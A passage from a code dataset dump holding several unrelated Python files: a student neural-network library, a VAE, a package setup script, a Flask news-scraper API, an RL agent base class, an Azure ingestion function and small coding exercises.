YOUR CODE **\n 
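# The LinearLayer backward pass above leans on three matmul shape identities;
# a tiny standalone numpy check of them (the dimensions are arbitrary).
import numpy as np

batch, n_in, n_out = 5, 3, 2
x = np.random.randn(batch, n_in)
W = np.random.randn(n_in, n_out)
grad_z = np.random.randn(batch, n_out)

assert np.matmul(x.T, grad_z).shape == W.shape                     # gradient w.r.t. W
assert np.matmul(np.ones((1, batch)), grad_z).shape == (1, n_out)  # gradient w.r.t. b
assert np.matmul(grad_z, W.T).shape == x.shape                     # gradient w.r.t. inputs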
#######################################################################\n\n\n def forward(self, x):\n \"\"\"\n Performs forward pass through the network.\n\n Arguments:\n x {np.ndarray} -- Input array of shape (batch_size, input_dim).\n\n Returns:\n {np.ndarray} -- Output array of shape (batch_size,\n #_neurons_in_final_layer)\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Forwards through all the layers\n for i in range(len(self._layers)):\n x = self._layers[i].forward(x)\n return x\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def __call__(self, x):\n \"\"\"\n Method to call the forward class from MultiLayer\n \"\"\"\n return self.forward(x)\n\n def backward(self, grad_z):\n \"\"\"\n Performs backward pass through the network.\n\n Arguments:\n grad_z {np.ndarray} -- Gradient array of shape (1,\n #_neurons_in_final_layer).\n\n Returns:\n {np.ndarray} -- Array containing gradient with repect to layer\n input, of shape (batch_size, input_dim).\n \"\"\"\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Backpropagation through all the layers\n for layer_n in range(len(self._layers)-1,-1,-1):\n grad_z = self._layers[layer_n].backward(grad_z)\n return grad_z #RETURNS GRADIENT OF FUNC WRT TO INPUTS\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def update_params(self, learning_rate):\n \"\"\"\n Performs one step of gradient descent with given learning rate on the\n parameters of all layers using currently stored gradients.\n\n Arguments:\n learning_rate {float} -- Learning rate of update step.\n \"\"\"\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Parameters update performed on the linear layers only\n for layer_n in range(len(self._layers)-1,-1,-1):\n if layer_n in self.index_linear_layer:\n self._layers[layer_n].update_params(learning_rate)\n else:\n continue\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n\ndef save_network(network, fpath):\n \"\"\"\n Utility function to pickle `network` at file path `fpath`.\n \"\"\"\n with open(fpath, \"wb\") as f:\n pickle.dump(network, f)\n\n\ndef load_network(fpath):\n \"\"\"\n Utility function to load network found at file path `fpath`.\n \"\"\"\n with open(fpath, \"rb\") as f:\n network = pickle.load(f)\n return network\n\n\nclass Trainer(object):\n \"\"\"\n Trainer: Object that manages the training of a neural network.\n \"\"\"\n\n def __init__(\n self,\n network,\n batch_size,\n nb_epoch,\n learning_rate,\n loss_fun,\n shuffle_flag\n ):\n \"\"\"Constructor.\n\n Arguments:\n network {MultiLayerNetwork} -- MultiLayerNetwork to be trained.\n batch_size {int} -- Training batch size.\n nb_epoch {int} -- Number of training epochs.\n learning_rate {float} -- SGD learning rate to be used in training.\n loss_fun {str} -- Loss function to be used. 
Possible values: mse,\n bce.\n shuffle_flag {bool} -- If True, training data is shuffled before\n training.\n \"\"\"\n self.multilayer_network = network\n self.batch_size = batch_size\n self.nb_epoch = nb_epoch\n self.learning_rate = learning_rate\n self.loss_fun = loss_fun\n self.shuffle_flag = shuffle_flag\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n if self.loss_fun is 'mse':\n self._loss_layer = MSELossLayer()\n elif self.loss_fun is 'cross_entropy':\n self._loss_layer = CrossEntropyLossLayer()\n else:\n raise Exception('Wrong Loss, chose between: mse, cross_entropy')\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n @staticmethod\n def shuffle(input_dataset, target_dataset):\n \"\"\"\n Returns shuffled versions of the inputs.\n\n Arguments:\n - input_dataset {np.ndarray} -- Array of input features, of shape\n (#_data_points, n_features).\n - target_dataset {np.ndarray} -- Array of corresponding targets, of\n shape (#_data_points, ).\n\n Returns: 2-tuple of np.ndarray: (shuffled inputs, shuffled_targets).\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Reshaping to use the create indices and shuffle the array\n if target_dataset.shape == (input_dataset.shape[0],):\n target_dataset = target_dataset.reshape(input_dataset.shape[0], 1)\n\n #Creating of shuffled indices to shuffle the full dataset\n indices = np.random.permutation(input_dataset.shape[0])\n\n shuffled_inputs = input_dataset[indices,:]\n shuffled_targets = target_dataset[indices,:]\n\n #Reshaping to comply with teh LabTS tests\n if shuffled_targets.shape == (input_dataset.shape[0], 1):\n shuffled_targets = shuffled_targets.reshape(input_dataset.shape[0],)\n\n return (shuffled_inputs, shuffled_targets)\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def train(self, input_dataset, target_dataset):\n \"\"\"\n Main training loop. 
Performs the following steps `nb_epoch` times:\n - Shuffles the input data (if `shuffle` is True)\n - Splits the dataset into batches of size `batch_size`.\n - For each batch:\n - Performs forward pass through the network given the current\n batch of inputs.\n - Computes loss.\n - Performs backward pass to compute gradients of loss with\n respect to parameters of network.\n - Performs one step of gradient descent on the network\n parameters.\n\n Arguments:\n - input_dataset {np.ndarray} -- Array of input features, of shape\n (#_training_data_points, n_features).\n - target_dataset {np.ndarray} -- Array of corresponding targets, of\n shape (#_training_data_points, ).\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Finding the number of batches based on the batch size\n n_batches = np.floor(input_dataset.shape[0]/self.batch_size).astype(int)\n\n for epoch in range(self.nb_epoch):\n\n #Reshaping in case of single input\n if input_dataset.shape == (input_dataset.shape[0],):\n input_dataset = input_dataset.reshape(input_dataset.shape[0], 1)\n\n if self.shuffle_flag:\n input_dataset,target_dataset = self.shuffle(input_dataset,target_dataset)\n\n #Reshaping to use hstack\n if target_dataset.shape == (input_dataset.shape[0],):\n target_dataset = target_dataset.reshape(input_dataset.shape[0], 1)\n\n #Splitting into the n batches\n data = np.hstack((input_dataset,target_dataset))\n batch_list = np.vsplit(data[:int(n_batches*self.batch_size)],n_batches)\n #Adding the remainder datapoints to the last batch\n if int(n_batches*self.batch_size) != data.shape[0]:\n batch_list.append(data[int(n_batches*self.batch_size):])\n\n #Performing backpropagation and paramters update\n for batch in batch_list:\n loss = self.eval_loss(batch[:,:-target_dataset.shape[1]],batch[:,-target_dataset.shape[1]:])\n #loss_arr.append(loss) ##TO BE TAKEN OFF ONCE NOT TESTING ANYMORE\n\n self.multilayer_network.backward(self.grad_z)\n self.multilayer_network.update_params(self.learning_rate)\n\n return\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def eval_loss(self, input_dataset, target_dataset):\n \"\"\"\n Function that evaluate the loss function for given data.\n\n Arguments:\n - input_dataset {np.ndarray} -- Array of input features, of shape\n (#_evaluation_data_points, n_features).\n - target_dataset {np.ndarray} -- Array of corresponding targets, of\n shape (#_evaluation_data_points, ).\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Going through the network\n prediction = self.multilayer_network.forward(input_dataset)\n\n #Computing the loss and the gradient with repect to the final outputs\n loss = self._loss_layer.forward(prediction, target_dataset)\n self.grad_z = self._loss_layer.backward()\n\n return loss\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n\nclass Preprocessor(object):\n \"\"\"\n Preprocessor: Object used to apply \"preprocessing\" operation to datasets.\n The object can also be used to revert the changes.\n \"\"\"\n\n def __init__(self, data):\n \"\"\"\n 
Initializes the Preprocessor according to the provided dataset.\n (Does not modify the dataset.)\n\n Arguments:\n - data {np.ndarray} dataset used to determined the parameters for\n the normalization. DATA HAS FEATURES - X\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n #Axis 0 which corresponds to taking the max for each feature\n self.max_data = np.max(data, axis = 0)\n self.min_data = np.min(data, axis = 0)\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def apply(self, data):\n \"\"\"\n Apply the pre-processing operations to the provided dataset.\n\n Arguments:\n - data {np.ndarray} dataset to be normalized.\n\n Returns:\n {np.ndarray} normalized dataset.\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n return (data - self.min_data)/(self.max_data - self.min_data)\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def revert(self, normalised_data):\n \"\"\"\n Revert the pre-processing operations to retreive the original dataset.\n\n Arguments:\n - data {np.ndarray} dataset for which to revert normalization.\n\n Returns:\n {np.ndarray} reverted dataset.\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n return self.min_data + normalised_data*(self.max_data - self.min_data)\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n\ndef example_main():\n input_dim = 4\n neurons = [2,3]\n activations = ['relu','sigmoid']\n net = MultiLayerNetwork(input_dim, neurons, activations)\n\n dat = np.loadtxt(\"iris.dat\")\n np.random.shuffle(dat)\n\n x = dat[:, :4]\n y = dat[:, 4:]\n\n split_idx = int(0.8 * len(x))\n\n x_train = x[:split_idx]\n y_train = y[:split_idx]\n x_val = x[split_idx:]\n y_val = y[split_idx:]\n\n prep_input = Preprocessor(x_train)\n\n x_train_pre = prep_input.apply(x_train)\n x_val_pre = prep_input.apply(x_val)\n\n trainer = Trainer(\n network=net,\n batch_size=8,\n nb_epoch=4000,\n learning_rate=0.01,\n loss_fun=\"cross_entropy\",\n shuffle_flag=True,\n )\n\n trainer.train(x_train_pre, y_train)\n print(\"Train loss = \", trainer.eval_loss(x_train_pre, y_train))\n print(\"Validation loss = \", trainer.eval_loss(x_val_pre, y_val))\n\n preds = net(x_val_pre).argmax(axis=1).squeeze()\n targets = y_val.argmax(axis=1).squeeze()\n accuracy = (preds == targets).mean()\n print(\"Validation accuracy: {}\".format(accuracy))\n\n\nif __name__ == \"__main__\":\n example_main()\n","sub_path":"nn_lib.py","file_name":"nn_lib.py","file_ext":"py","file_size_in_byte":26114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"566730006","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport os\nfrom utils import *\n\n\nclass VariantionalAutoencoder(object):\n def __init__(self, latent_dim, image_dim=28 * 28):\n 
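# The Preprocessor above is per-column min-max scaling; a quick property check
# that apply() maps the fitted data into [0, 1] and revert() inverts it exactly.
# The random data is illustrative only.
import numpy as np

data = np.random.randn(50, 4) * 7.0 + 3.0
prep = Preprocessor(data)
scaled = prep.apply(data)
assert scaled.min() >= 0.0 and scaled.max() <= 1.0
assert np.allclose(prep.revert(scaled), data)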
self.latent_dim = latent_dim\n self.learning_rate = 1e-2\n\n self.image_dim = image_dim\n\n self.build_model()\n\n def build_model(self):\n self.x = tf.placeholder(name='x', dtype=tf.float32, shape=[None, self.image_dim])\n\n # Gaussian MLP as encoder\n with tf.variable_scope(\"gaussian_MLP_encoder\"):\n he1 = tf.layers.dense(self.x, 256, activation=tf.nn.relu)\n he2 = tf.layers.dense(he1, 256, activation=tf.nn.relu)\n z_mu = tf.layers.dense(he2, self.latent_dim, activation=None)\n z_log_sigma = tf.layers.dense(he2, self.latent_dim, activation=None)\n\n eps = tf.random_normal(tf.shape(z_mu), 0, 1, dtype=tf.float32)\n self.z = z_mu + tf.exp(z_log_sigma * 0.5) * eps\n\n # Bernoulli MLP as decoder\n with tf.variable_scope(\"bernoulli_MLP_decoder\"):\n hd1 = tf.layers.dense(self.z, 256, activation=tf.nn.relu)\n hd2 = tf.layers.dense(hd1, 256, activation=tf.nn.relu)\n self.x_hat = tf.layers.dense(hd2, self.image_dim, activation=tf.nn.sigmoid)\n\n with tf.variable_scope(\"loss\"):\n # Reconstruction loss\n # Minimize the cross-entropy loss\n # H(x, x_hat) = -\\Sigma x*log(x_hat) + (1-x)*log(1-x_hat)\n recon_loss = tf.reduce_sum(tf.losses.log_loss(self.x, self.x_hat, reduction=\"none\"), axis=1)\n self.recon_loss = tf.reduce_mean(recon_loss)\n\n # Latent loss\n # Kullback Leibler divergence: measure the difference between two distributions\n # Here we measure the divergence between the latent distribution and N(0, 1)\n latent_loss = -0.5 * tf.reduce_sum(\n 1 + z_log_sigma - tf.square(z_mu) - tf.exp(z_log_sigma), axis=1)\n\n self.latent_loss = tf.reduce_mean(latent_loss)\n self.total_loss = tf.reduce_mean(recon_loss + latent_loss)\n self.train_op = tf.train.AdamOptimizer(\n learning_rate=self.learning_rate).minimize(self.total_loss)\n\n\ndef main():\n batch_size = 128\n latent_dim = 100\n\n f_mnist = input_data.read_data_sets('../data/fashion_mnist', one_hot=True)\n\n vae = VariantionalAutoencoder(latent_dim)\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n if not os.path.exists('out/'):\n os.makedirs('out/')\n\n i = 0\n for it in range(100000):\n if it % 1000 == 0:\n samples = sess.run(vae.x_hat, feed_dict={vae.z: sample_z(16, latent_dim)})\n\n fig = plot(samples)\n plt.savefig('out/{}.png'.format(str(i).zfill(3)), bbox_inches='tight')\n i += 1\n plt.close(fig)\n\n x_image, _ = f_mnist.train.next_batch(batch_size)\n\n _, loss, recon_loss, latent_loss = sess.run(\n [vae.train_op, vae.total_loss, vae.recon_loss, vae.latent_loss],\n feed_dict={vae.x: x_image}\n )\n\n if it % 1000 == 0:\n print('[Iter {}] Loss: {}, Recon loss: {}, Latent loss: {}'.format(\n it, loss, recon_loss, latent_loss))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"vae/vae_fashion_mnist.py","file_name":"vae_fashion_mnist.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"596682100","text":"from setuptools import setup\nfrom setuptools.command.test import test as TestCommand\nimport csmash\n\nrequirements = [\n 'PasteDeploy'\n]\n\ntest_requirements = [\n 'virtualenv == 1.7.1.2',\n 'tox == 1.3',\n 'pytest == 2.2.4',\n 'pylint == 0.25.1',\n 'pytest-pep8 == 0.8',\n]\n\n\nclass ToxTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n from pylint.lint import Run\n Run(['csmash', '--reports=n', '--include-ids=y'], exit=False)\n import tox\n tox.cmdline(args=[])\n\n\nsetup(\n 
name=\"configsmash\",\n version=csmash.__version__,\n author=\"Robby Ranshous\",\n author_email=\"rranshous@gmail.com\",\n description=(\"python lib / script for reading\"\n \" cascading sets of ini files\"),\n keywords=\"configuration\",\n url=\"https://github.com/rranshous/configsmash\",\n py_modules=[\"csmash\"],\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Topic :: Utilities\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.2\",\n ],\n install_requires=requirements,\n tests_require=test_requirements,\n cmdclass={\n 'test': ToxTest,\n },\n entry_points={\n 'console_scripts': [\n 'csmash = csmash:cli',\n ]\n },\n)\n","sub_path":"pypi_install_script/configsmash-0.0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"492649144","text":"from flask import Flask, request, jsonify, redirect, url_for\nfrom flask_cors import CORS, cross_origin\nimport json\nfrom views import index\nimport sys\nimport json\nfrom time import mktime\nimport nltk\nfrom datetime import datetime\nimport feedparser as fp\nimport newspaper\nfrom newspaper import Article\nnltk.download('punkt')\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS']='Content-Type'\n\n@app.route(\"/\")\n@cross_origin()\ndef pg():\n index()\n return \"k\"\n\n### NEWS PAPER SCRAPING\n\ndata = {}\ndata[\"newspapers\"] = {}\nmax_articles_from_single_source_limit = 10\n\ndef parse_config(fname):\n # Loads the JSON files with news sites\n with open(fname, \"r\") as data_file:\n cfg = json.load(data_file)\n\n for company, value in cfg.items():\n if \"link\" not in value:\n raise ValueError(f\"Configuration item {company} missing obligatory 'link'.\")\n\n return cfg\n\n\ndef _handle_rss(company, value, count, limit):\n \"\"\"If a RSS link is provided in the JSON file, this will be the first\n choice. If you do not want to scrape from the RSS-feed, just leave the RSS\n attr empty in the JSON file.\n \"\"\"\n\n fpd = fp.parse(value[\"rss\"])\n # print(f\"Downloading articles from {company}\")\n news_paper = {\"rss\": value[\"rss\"], \"link\": value[\"link\"], \"articles\": []}\n for entry in fpd.entries:\n # Check if publish date is provided, if no the article is\n # skipped. This is done to keep consistency in the data and to\n # keep the script from crashing.\n if not hasattr(entry, \"published\"):\n continue\n if count > limit:\n break\n article = {}\n article[\"link\"] = entry.link\n date = entry.published_parsed\n article[\"published\"] = datetime.fromtimestamp(mktime(date)).isoformat()\n try:\n content = Article(entry.link)\n content.download()\n content.parse()\n except Exception as err:\n # If the download for some reason fails (ex. 
404) the\n # script will continue downloading the next article.\n print(err)\n print(\"continuing...\")\n continue\n article[\"title\"] = content.title\n article[\"text\"] = content.text\n article[\"keywords\"] = content.keywords\n article[\"top_image\"] = content.top_image\n news_paper[\"articles\"].append(article)\n # print(f\"{count} articles downloaded from {company}, url: {entry.link}\")\n count = count + 1\n return count, news_paper\n\n\ndef _handle_fallback(company, value, count, limit):\n \"\"\"This is the fallback method that uses the python newspaper library \n to extract articles if a RSS-feed link is not provided.\"\"\"\n\n # print(f\"Building site for {company}\")\n paper = newspaper.build(value[\"link\"], memoize_articles=False)\n news_paper = {\"link\": value[\"link\"], \"articles\": []}\n none_type_count = 0\n for content in paper.articles:\n if count > limit:\n break\n try:\n content.download()\n content.parse()\n content.nlp()\n except Exception as err:\n print(err)\n print(\"continuing...\")\n continue\n # If there is no found publish date the article will be skipped.\n # After 10 downloaded articles from the same newspaper without publish date, the company will be skipped.\n if content.publish_date is None:\n # print(f\"{count} Article has date of type None...\")\n none_type_count = none_type_count + 1\n if none_type_count > 10:\n # print(\"Too many noneType dates, aborting...\")\n none_type_count = 0\n break\n count = count + 1\n continue\n article = {\n \"title\": content.title,\n \"text\": content.text,\n \"link\": content.url,\n \"keywords\": content.keywords,\n \"top_image\": content.top_image,\n \"published\": content.publish_date.isoformat(),\n }\n news_paper[\"articles\"].append(article)\n print(\n f\"{count} articles downloaded from {company} using newspaper, url: {content.url}, keywords:{content.keywords}, top_images:{content.top_image}\"\n )\n count = count + 1\n none_type_count = 0\n return count, news_paper\n\n\ndef run(config, limit=4):\n \"\"\"Take a config object of sites and urls, and an upper limit. 
Iterate through each news company.\n Write result to scraped_articles.json.\"\"\"\n for company, value in config.items():\n count = 1\n if \"rss\" in value:\n count, news_paper = _handle_rss(company, value, count, max_articles_from_single_source_limit)\n else:\n count, news_paper = _handle_fallback(company, value, count, max_articles_from_single_source_limit)\n data[\"newspapers\"][company] = news_paper\n\n # Finally it saves the articles as a JSON-file.\n try:\n with open(\"scraped_articles.json\", \"w\") as outfile:\n json.dump(data, outfile, indent=2)\n except Exception as err:\n print(err)\n\ndef news():\n \"\"\"News site scraper.\"\"\"\n try:\n config = parse_config(\"NewsPapers.json\")\n except Exception as err:\n sys.exit(err)\n run(config)\n\n#------------------------------------------------------------\n### APIS\n\n### Returns the list of all articles from scraped_articles.json\n\n@app.route(\"/get-top-news-articles/\", methods=['GET'])\ndef get_top_news_articles():\n\n news()\n articles_list = []\n with open(\"scraped_articles.json\", \"r\") as data_file:\n scraped_file = json.load(data_file)\n\n for papers, eachpaper in scraped_file.items():\n for paper, link_and_articles in eachpaper.items():\n if \"link\" not in link_and_articles:\n raise ValueError(f\"Configuration item {link_and_articles} missing obligatory 'link'.\")\n else:\n for article in link_and_articles['articles']:\n articles_list.append(article)\n \n return jsonify(articles_list)\n\n### Accepts the article the user clicks on and sends it's keywords \n### to the twitter data extraction function\n\n@app.route(\"/post-selected-news-article/\", methods=['GET','POST'])\ndef post_selected_news_article():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n # print( request.get_json() )\n for keyword in request.get_json()['keywords']:\n print(keyword)\n break\n return jsonify(response_object)\n\n# @app.route(\"/get-selected-news-keywords/\", methods=['GET'])\n# def get_selected_news_keywords():\n\n# keywords_list = []\n# with open(\"scraped_articles.json\", \"r\") as data_file:\n# scraped_file = json.load(data_file)\n\n# for comp, paper in scraped_file.items():\n# for b, value in paper.items():\n# if \"link\" not in value:\n# raise ValueError(f\"Configuration item {value} missing obligatory 'link'.\")\n# else:\n# for article in value['articles']:\n# for keyword in article['keywords']:\n# print(\"hi\")\n# keywords_list.append(keyword)\n \n# return jsonify(keywords_list)\n\n# @app.route(\"/get-top-news-keywords/\", methods=['GET'])\n# def get_top_news_keywords():\n\n# keywords_list = []\n# with open(\"scraped_articles.json\", \"r\") as data_file:\n# scraped_file = json.load(data_file)\n\n# for comp, paper in scraped_file.items():\n# for b, value in paper.items():\n# if \"link\" not in value:\n# raise ValueError(f\"Configuration item {value} missing obligatory 'link'.\")\n# else:\n# for article in value['articles']:\n# for keyword in article['keywords']:\n# keywords_list.append(keyword)\n \n# return jsonify(keywords_list)\n\n\n#-----------------------------\n\nif __name__ == '__main__':\n # Threaded option to enable multiple instances for multiple user access support\n app.run(threaded=True, port=5000)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"132046713","text":"import numpy as np\nimport tensorflow as tf\n\nclass Agent(tf.keras.Model):\n def __init__(\n 
self,\n            model,\n            n_actions,\n            n_features,\n            learning_rate=0.01,\n            reward_decay=0.99,\n            e_greedy=0.1,\n            replace_target_iter=300,\n            batch_size=32,\n            e_greedy_decrement=None,\n            epsilon_decay_step=10**6,\n            update_interval=1,\n            optimizer=None,\n            trainable=True,\n            is_dueling=False,\n            is_categorical=False,\n            is_noise=False,\n            gpu=0):\n        super().__init__()\n        self.model = model\n        self.n_actions = n_actions\n        self.actions_list = list(range(self.n_actions))\n        self.n_features = n_features if isinstance(n_features, tuple) else (n_features,)\n        self.lr = learning_rate\n        self.discount = tf.constant(reward_decay) #discount\n        self.epsilon_min = e_greedy\n        self.replace_target_iter = replace_target_iter\n        self.update_interval = update_interval\n        self.batch_size = batch_size\n        self._optimizer = optimizer\n        self.is_dueling = is_dueling\n        self.is_categorical = is_categorical\n        self.is_noise = is_noise\n        self.trainable = trainable\n        self.epsilon = 0.0 if self.is_noise else 0.9\n        self.epsilon_decrement = e_greedy_decrement if e_greedy_decrement is not None else (self.epsilon - self.epsilon_min)/ epsilon_decay_step\n        self.device = \"/gpu:{}\".format(gpu) if gpu >= 0 else \"/cpu:0\"\n\n        # total learning step\n        self._iteration = 0\n\n    def _build_net(self):\n        # check the subclass instance, not its name string: the original\n        # hasattr(self.__class__.__name__, 'main_net') was always False\n        if not hasattr(self, 'main_net'):\n            raise Exception('please set build net')\n        if self._optimizer is None:\n            raise Exception('please set Optimizer')\n\n    def inference(self, state):\n        raise NotImplementedError()\n\n    def choose_action(self, observation, test=False):\n        raise NotImplementedError()","sub_path":"agent/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"574283329","text":"import logging\nimport os, uuid, sys\nimport azure.functions as func\nimport asyncio\nimport json\nimport pathlib\n\nfrom ..shared_code import storage_helpers\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n\n    logging.info('IngestionTrigger function processed a request.')\n\n    STORAGE_NAME = os.environ['STORAGE_ACCOUNT_NAME']\n    STORAGE_KEY = os.environ['STORAGE_ACCOUNT_KEY']\n    SAS_TOKEN = os.environ['STORAGE_SAS_TOKEN']\n    CONTAINER = os.environ['DATA_CONTAINER']\n    STATUS_TABLE = os.environ['STATUS_TABLE']\n    UPLOAD_QUEUE = os.environ['UPLOAD_QUEUE']\n\n    blobService = storage_helpers.createBlobService(STORAGE_NAME,STORAGE_KEY)\n    queueService = storage_helpers.createQueueService(STORAGE_NAME,STORAGE_KEY)\n    tableService = storage_helpers.createTableService(STORAGE_NAME,STORAGE_KEY)\n\n    if(blobService != None and queueService != None and tableService != None):\n\n        print(\"OK\")\n        blobGenerator = storage_helpers.listBlobs(blobService,CONTAINER) \n        # creating a blob list\n        blobs = storage_helpers.generateBlobList(blobGenerator,CONTAINER,STORAGE_NAME,SAS_TOKEN)\n        blobsToIngest = []\n\n        for blob in blobs:\n            # Check if blob was already ingested or not with the status table\n            # The partition key is the container name and the row key is the blob name \n            status = \"NotFound\"\n            blobStatus = storage_helpers.queryEntity(tableService,STATUS_TABLE,CONTAINER,blob['name'])\n            if(blobStatus != None):\n                status = blobStatus\n            # If the blob was never ingested or the ingestion failed, we want to ingest it\n            if(status == 'NotFound' or status == 'failure'):\n                blobsToIngest.append(blob)\n                storage_helpers.addToQueue(queueService,UPLOAD_QUEUE,storage_helpers.createQueueMessage(blob))\n                # Update status of blob to \"queued\"\n                newBlobStatus = 
'PartitionKey': CONTAINER, 'RowKey': blob['name'], 'status': 'queued'}\n                storage_helpers.insertOrMergeEntity(tableService,STATUS_TABLE,newBlobStatus)\n\n        logging.info(\"%d blobs found in %s\" % (len(blobs),CONTAINER))\n        logging.info(\"%d blobs to ingest in %s\" % (len(blobsToIngest),CONTAINER))\n\n    else:\n        logging.warning(\"Could not trigger the ingestion process.\")\n\n    if blobService:\n        return func.HttpResponse(f\"OK\",status_code=200)\n    else:\n        return func.HttpResponse(\n            \"Error\",\n            status_code=400\n        )\n","sub_path":"IngestionTrigger/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"186421032","text":"def is_inside(a, b):\r\n    xa = a[0]\r\n    ya = a[1]\r\n    xb = b[0]\r\n    yb = b[1]\r\n    w = b[2]\r\n    h = b[3]\r\n    # point a is inside box b when both of its coordinates fall within the box's ranges\r\n    return xa in range(xb, xb + h) and ya in range(yb, yb + w)\r\n\r\nif is_inside([100,100],[50,50,100,100]):\r\n    print(\"Your function is correct\")\r\nelse:\r\n    print(\"Ooops, bugs detected\")\r\n","sub_path":"Session5/excercise_11_12.py","file_name":"excercise_11_12.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"549617595","text":"class Solution:\r\n    def findMedianSortedArrays(self, nums1, nums2):\r\n        lennums1=len(nums1)\r\n        lennums2=len(nums2)\r\n        if (lennums1+lennums2)%2==0:\r\n            return (self.theKthnumber(nums1,nums2,(lennums1+lennums2)//2)+self.theKthnumber(nums1,nums2,(lennums1+lennums2)//2-1))/2\r\n        else:\r\n            return self.theKthnumber(nums1,nums2,(lennums1+lennums2)//2)\r\n\r\n\r\n    def theKthnumber(self,nums1,nums2,k):\r\n        if len(nums1)>len(nums2):\r\n            return self.theKthnumber(nums2,nums1,k)\r\n        if len(nums1)==0:\r\n            return nums2[k]\r\n        if k==0:\r\n            return min(nums2[0],nums1[0])\r\n        if nums1[len(nums1)//2]>nums2[len(nums2)//2]:\r\n            if k>len(nums1)//2+len(nums2)//2:\r\n                return self.theKthnumber(nums1, nums2[len(nums2) // 2+1:], k - len(nums2) // 2-1)\r\n            else:\r\n                return self.theKthnumber(nums1[:len(nums1) // 2], nums2, k)\r\n        else:\r\n            if k > len(nums1) // 2 + len(nums2) // 2:\r\n                return self.theKthnumber(nums1[len(nums1) // 2+1:], nums2, k - len(nums1) // 2-1)\r\n            else:\r\n                return self.theKthnumber(nums1, nums2[:len(nums2) // 2], k)\r\n\r\n\r\n    def findMedianSortedArrays1(self, nums1, nums2):\r\n        if nums1==[]:\r\n            if len(nums2)%2==0:\r\n                return (nums2[len(nums2)//2]+nums2[len(nums2)//2-1])/2\r\n            else:\r\n                return nums2[len(nums2)//2]\r\n        elif nums2==[]:\r\n            if len(nums1)%2==0:\r\n                return (nums1[len(nums1)//2]+nums1[len(nums1)//2-1])/2\r\n            else:\r\n                return nums1[len(nums1)//2]\r\n        else:\r\n            n = len(nums1) + len(nums2)\r\n            if n % 2 != 0: # [2,2,2,2][2,2,2]\r\n                # nums2 left of nums1\r\n                if n // 2 > len(nums2) and nums1[n // 2 - len(nums2)] >= nums2[-1]:\r\n                    return nums1[n // 2 - len(nums2)]\r\n                elif n // 2 == len(nums2) and nums1[n // 2 - len(nums2)] >= nums2[-1]:\r\n                    return nums1[n // 2 - len(nums2)]\r\n                elif n // 2 < len(nums2) and nums1[0] >= nums2[n // 2]:\r\n                    return nums2[n // 2]\r\n                elif n // 2 == len(nums2) and nums1[0] >= nums2[-1]:\r\n                    return nums1[0]\r\n                # nums2 right of nums1\r\n                elif n // 2 >= len(nums1) and nums2[n // 2 - len(nums1)] >= nums1[-1]:\r\n                    return nums2[n // 2 - len(nums1)]\r\n                elif n // 2 < len(nums1) and nums2[0] >= nums1[n // 2]:\r\n                    return nums1[n // 2]\r\n                elif n // 2 == len(nums1) and nums2[0] >= nums1[-1]:\r\n                    return nums2[0]\r\n                
